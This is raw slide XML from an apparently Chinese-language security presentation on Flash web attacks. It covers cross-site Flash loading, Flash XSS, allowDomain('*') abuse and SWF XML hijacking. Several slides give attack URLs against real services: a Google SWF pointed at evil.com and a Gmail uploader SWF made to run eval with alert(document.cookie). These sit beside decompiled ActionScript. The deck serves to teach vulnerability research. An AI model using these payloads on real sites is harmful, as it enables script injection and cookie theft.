              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>大法，见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>小节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9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XSF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洞利用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XSF(Cross Site Flash)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>即跨站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输入是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SWF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://foo.com/f.swf?swf=//evil.com/e.swf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://evil.com/e.swf?swf=//foo.com/f.swf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AS2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>loadMovie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AS3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>new Loader() + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>URLRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>URLLoader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2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86" y="1495325"/>
            <a:ext cx="5800027" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13864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 &amp; evil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foo &lt;- evil</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Flash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>allowScriptAccess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sameDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>allowNetworking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>='internal'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>allowFullScreen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>='false'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以拥有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的一切权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>foo -&gt; evil</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>更有意思的在这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 -&gt; evil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25606" y="1988840"/>
            <a:ext cx="7092788" cy="3240360"/>
            <a:chOff x="863588" y="1700808"/>
            <a:chExt cx="7092788" cy="3240360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3275856" y="1700808"/>
              <a:ext cx="2952328" cy="32403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Foo Site SWF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876256" y="2804833"/>
              <a:ext cx="1080120" cy="16083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Evil Site SWF</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>Loader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283968" y="2218807"/>
              <a:ext cx="180020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allowDomain</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>('*')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283968" y="3179105"/>
              <a:ext cx="180020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public class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283968" y="4139403"/>
              <a:ext cx="180020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steal data</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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863588" y="2804834"/>
              <a:ext cx="1764196" cy="1608369"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartDocumen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Foo Site</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>crossdomain.xml</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>allow-access-from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6300192" y="3179105"/>
              <a:ext cx="50405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2699792" y="3179105"/>
              <a:ext cx="50405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699792" y="3609018"/>
              <a:ext cx="50405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6289278" y="3609018"/>
              <a:ext cx="50405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3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 -&gt; evil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这种模型关键点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>allowDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>('*')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>之后很多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数可以直</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>控</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>制，如：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关的初</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>化函数需要成功运行，否则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>allowDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>会失败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09681" y="3068960"/>
            <a:ext cx="85107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domain:ApplicationDomain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loader.contentLoaderInfo.applicationDomain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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>动态获取定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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boxClass:Class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domain.getDefinition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rgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>com.example.Box</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>") as Class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boxInstance:Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>boxClass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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>catch(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>err:Error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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trace(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>err.message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foo -&gt; evil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 Rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>另类植入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>当不存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>addCallback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>接口时</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过这种方式也可以植入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Flash Rootkit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7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Flash Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击的关键点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0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sharedEvents</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean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shared:EventDispatcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>loader.contentLoaderInfo.sharedEvents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似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postMessage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/>
              <a:t>暴</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>露的事件可以作为输入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7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XSF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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>例分析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洞挖掘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8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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>挖掘</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1941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成功反编译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需应对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的多种文件格式差异</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>动态调试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Fiddler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等抓包观察会关联请求什么资源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crossdomain.xml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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SWF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1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我的字典</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="折角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="2312720"/>
            <a:ext cx="2890664" cy="3960127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_root/_global/_level0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>root.loaderInfo.parameters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LoadVars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Loader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>loadBytes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URLLoader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URLRequest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XML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>loadMovie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ExternalInterface</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="折角形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4227672" y="2312720"/>
            <a:ext cx="2890664" cy="2591976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allowDomain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>allowInsecureDomain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SharedObject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getURL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navigateToURL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sharedEvents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1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SWF XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>劫持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607889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myXML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = new XML();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__callResult_162 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>myXML.load</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(( ( "http://" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root.host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en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+ "/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>load.php?action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playerad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" ));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myXML.ignoreWhite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = True;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myXML.onLoad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = function (success) {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type = myXML.childNodes.0.childNodes.0.childNodes.0.nodeValue;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adurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = myXML.childNodes.0.childNodes.1.childNodes.0.nodeValue;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_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>global.sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> =  Number(myXML.childNodes.0.childNodes.2.childNodes.0. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nodeValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) 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std</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = myXML.childNodes.0.childNodes.3.childNodes.0.nodeValue;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if ( ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>std</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> == 1 ) ) {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if ( ( type == 1 ) ) {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mp1.contentPath = ( ( ( "http://" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root.host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) + "/" ) + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> );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__callResult_267 = mp1.play</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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</a:rPr>
              <a:t>劫持：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> http://www.google.com/ads/videopbox.swf?home_host_port=evil.com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SWF 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filetype:swf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site:google.com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http://www.google.com/enterprise/mini/control.swf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3212976"/>
            <a:ext cx="5165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 ( !(__callResult_6871 ) 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__callResult_6880 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>getURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(_level0.onend, "");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Gmail SWF XSS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https://mail.google.com/mail/uploader/uploaderapi2.swf?apiInit=eval&amp;apiId=alert(document.cookie)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3424932"/>
            <a:ext cx="8784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flashParams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:* = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LoaderInfo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this.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root.loaderInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>).parameters;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API_ID = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apiId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flashParams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ? (String(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flashParams.apiId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)) : ("");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API_INIT = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apiInit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flashParams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ? (String(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flashParams.apiInit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)) : ("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onUploaderApiReady</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ExternalInterface.available</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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ExternalInterface.call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(API_INIT, API_ID);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Sina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> Flash Rootkit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285" y="1484784"/>
            <a:ext cx="78536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ActionScript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2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security.allowDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("*");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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ExternalInterface.addCallback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>getLazyInterface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>",</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cInter.getLazyInterface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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ExternalInterface.addCallback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
